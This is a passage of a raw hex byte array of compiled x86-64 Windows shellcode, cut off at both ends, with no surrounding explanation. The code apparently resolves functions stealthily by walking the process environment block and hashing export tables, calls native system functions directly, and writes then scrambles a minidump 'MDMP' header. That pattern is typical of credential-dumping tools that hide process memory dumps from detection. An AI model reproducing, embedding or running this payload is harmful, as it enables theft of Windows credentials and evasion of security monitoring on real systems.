x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x41,0xB9,0x10,0x00,0x00,0x00,0x49,0x89,0xC0,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x79,0x4D,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xAD,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x0F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xEA,0x8B,0x45,0xF4,0x83,0xE8,0x01,0x89,0x45,0xF0,0xEB,0x73,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x8B,0x45,0xF0,0x89,0x45,0xEC,0xEB,0x0B,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x8B,0x45,0xEC,0x8D,0x50,0xFF,0x89,0x55,0xEC,0x85,0xC0,0x75,0xE8,0x48,0x83,0x7D,0xF8,0x00,0x74,0x40,0x8B,0x55,0x18,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFA,0x96,0x00,0x00,0x48,0x8B,0x05,0x6B,0x28,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x63,0x28,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x6D,0xF0,0x01,0x83,0x7D,0xF0,0x00,0x79,0x87,0xEB,0x01,0x90,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0x10,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x28,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x10,0x00,0x00,0x49,0x89,0xD1,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x89,0x48,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0x18,0x48,0x85,0xC0,0x74,0x42,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x17,0x96,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x18,0x41,0xB9,0x00,0x80,0x00,0x00,0x49,0x89,0xC0,0x48,0x8D,0x55,0x10,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x58,0x48,0x00,0x00,0x89,0x45,0xFC,0xEB,0x01,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x48,0x8D,0x45,0xF8,0x48,0x89,0xC1,0xE8,0xD6,0xEF,0xFF,0xFF,0x89,0xC1,0xE8,0xD7,0x95,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x4D,0x44,0x4D,0x50,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x93,0xA7,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE9,0xEF,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x97,0x95,0x00,0x00,0xC1,0xE0,0x11,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0x7F,0x95,0x00,0x00,0xC1,0xE0,0x02,0x25,0xFC,0xFF,0x01,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0x62,0x95,0x00,0x00,0x83,0xE0,0x03,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x00,0x00,0xE8,0x41,0x95,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0xE8,0x1C,0x95,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE8,0xF5,0x94,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0xE8,0xD0,0x94,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0x48,0x8B,0x45,0x10,0x8B,0x00,0x3D,0x4D,0x44,0x4D,0x50,0x0F,0x84,0x00,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x66,0x3D,0x93,0xA7,0x0F,0x84,0xEF,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x0F,0x84,0xDF,0xFE,0xFF,0xFF,0x90,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1F,0x49,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x90,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xE8,0x00,0x02,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0x67,0x25,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x5B,0x25,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0x44,0x8B,0x45,0xE8,0x48,0x8B,0x4D,0xF0,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xE8,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x1B,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA3,0x44,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x1B,0x48,0x8B,0x45,0x28,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x30,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5A,0x93,0x00,0x00,0x48,0x8B,0x05,0xCB,0x24,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC3,0x24,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x23,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xDF,0x43,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xF5,0x52,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x48,0x48,0x8D,0x6C,0x24,0x40,0x48,0x89,0x4D,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xEC,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xFB,0xFD,0xFF,0xFF,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x1F,0x01,0x00,0x00,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x55,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDF,0x91,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x4C,0x23,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x48,0x23,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBE,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x08,0x48,0x8D,0x15,0x0B,0xB4,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0D,0x92,0x00,0x00,0x48,0x85,0xC0,0x74,0x52,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6E,0x91,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0xDB,0x22,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD7,0x22,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xEB,0x50,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x42,0x8B,0x45,0xEC,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1C,0x91,0x00,0x00,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x89,0x22,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x85,0x22,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x48,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x83,0x7D,0x10,0x00,0x75,0x0E,0x48,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x83,0x7D,0x10,0x00,0x74,0x2D,0x8B,0x45,0x10,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x89,0xC1,0xE8,0x43,0x14,0x00,0x00,0x48,0x89,0x45,0x18,0x48,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x48,0x8B,0x45,0x18,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0x45,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0xBA,0x00,0x00,0x00,0x00,0xB9,0x00,0x10,0x00,0x00,0xE8,0x7C,0x13,0x00,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x48,0x8B,0x45,0xF8,0x48,0x89,0xC1,0xE8,0x18,0xFD,0xFF,0xFF,0x89,0x45,0xF4,0x48,0x8B,0x45,0xF8,0x48,0x89,0xC1,0xE8,0x77,0x40,0x00,0x00,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xDC,0x60,0x00,0x00,0x00,0x8B,0x45,0xDC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x39,0xD0,0x72,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x40,0x89,0xC0,0x48,0x01,0xD0,0x48,0x8B,0x55,0x10,0x48,0x39,0xC2,0x73,0x0A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0xEB,0x1A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAD,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x83,0x7D,0x10,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6A,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x0F,0xB7,0x00,0x66,0x3D,0x4D,0x5A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x3D,0x50,0x45,0x00,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x25,0x48,0x8B,0x45,0xF0,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xEE,0x0F,0xB7,0x45,0xEE,0x25,0x00,0x20,0x00,0x00,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xD4,0x60,0x00,0x00,0x00,0x8B,0x45,0xD4,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC8,0x48,0x8B,0x45,0xC8,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0xEB,0x47,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x48,0x39,0x45,0x10,0x74,0x2A,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x40,0x30,0x8B,0x55,0x18,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAE,0x01,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xD8,0x00,0x74,0x09,0x48,0x8B,0x45,0xD8,0xEB,0x1E,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x3B,0x45,0xE0,0x75,0xAF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x68,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x00,0x03,0x00,0x00,0x48,0x89,0x95,0x08,0x03,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0xBA,0x2E,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x40,0x8E,0x00,0x00,0x48,0x83,0xC0,0x01,0x48,0x89,0x85,0xD8,0x02,0x00,0x00,0x48,0x8B,0x95,0xD8,0x02,0x00,0x00,0x48,0x8B,0x85,0x08,0x03,0x00,0x00,0x48,0x29,0xC2,0x89,0x95,0xD4,0x02,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xB9,0x20,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x89,0xFA,0x89,0x02,0x48,0x83,0xC2,0x04,0x88,0x02,0x48,0x83,0xC2,0x01,0x8B,0x8D,0xD4,0x02,0x00,0x00,0x48,0x8B,0x95,0x08,0x03,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xD1,0x8D,0x00,0x00,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB2,0x8D,0x00,0x00,0x48,0x89,0xC2,0x48,0x8D,0x85,0xB0,0x01,0x00,0x00,0x48,0x01,0xD0,0xC7,0x00,0x64,0x6C,0x6C,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x32,0x8D,0x00,0x00,0x48,0x8D,0x45,0xA0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0x02,0x00,0x00,0x48,0x89,0x85,0xC8,0x02,0x00,0x00,0x48,0x83,0xBD,0xC8,0x02,0x00,0x00,0x00,0x75,0x30,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE5,0x36,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0x00,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2A,0xFE,0xFF,0xFF,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0xEB,0x34,0x48,0x8B,0x85,0xD8,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB5,0x36,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC8,0x02,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0x00,0x00,0x00,0x48,0x89,0x85,0xC0,0x02,0x00,0x00,0x48,0x8B,0x85,0xC0,0x02,0x00,0x00,0x48,0x81,0xC4,0x68,0x03,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0xC0,0x66,0x89,0x45,0x20,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x30,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA9,0x01,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xD8,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x85,0xC0,0x74,0x0A,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x5F,0x01,0x00,0x00,0x48,0x8B,0x45,0xD8,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD8,0x8B,0x40,0x04,0x89,0x45,0xCC,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x7D,0x18,0x00,0x0F,0x84,0x81,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x6A,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xB8,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xA8,0x48,0x8B,0x45,0xA8,0x48,0x89,0xC1,0xE8,0x6B,0x35,0x00,0x00,0x39,0x45,0x18,0x75,0x34,0x8B,0x45,0xF4,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0xB0,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0xEB,0x3F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x18,0x39,0x45,0xF4,0x72,0x8A,0xEB,0x2D,0x0F,0xB7,0x55,0x20,0x48,0x8B,0x45,0xD0,0x8B,0x40,0x10,0x29,0xC2,0x89,0xD0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC0,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x38,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0xD0,0x48,0x39,0xC2,0x72,0x27,0x8B,0x55,0xCC,0x48,0x8B,0x45,0xD0,0x48,0x01,0xD0,0x48,0x8B,0x55,0xF8,0x48,0x39,0xC2,0x73,0x14,0x48,0x8B,0x55,0xF8,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xB6,0xFC,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xC8,0x60,0x00,0x00,0x00,0x8B,0x45,0xC8,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0x10,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xED,0x8A,0x00,0x00,0x48,0x85,0xC0,0x0F,0x95,0xC0,0x0F,0xB6,0xC0,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0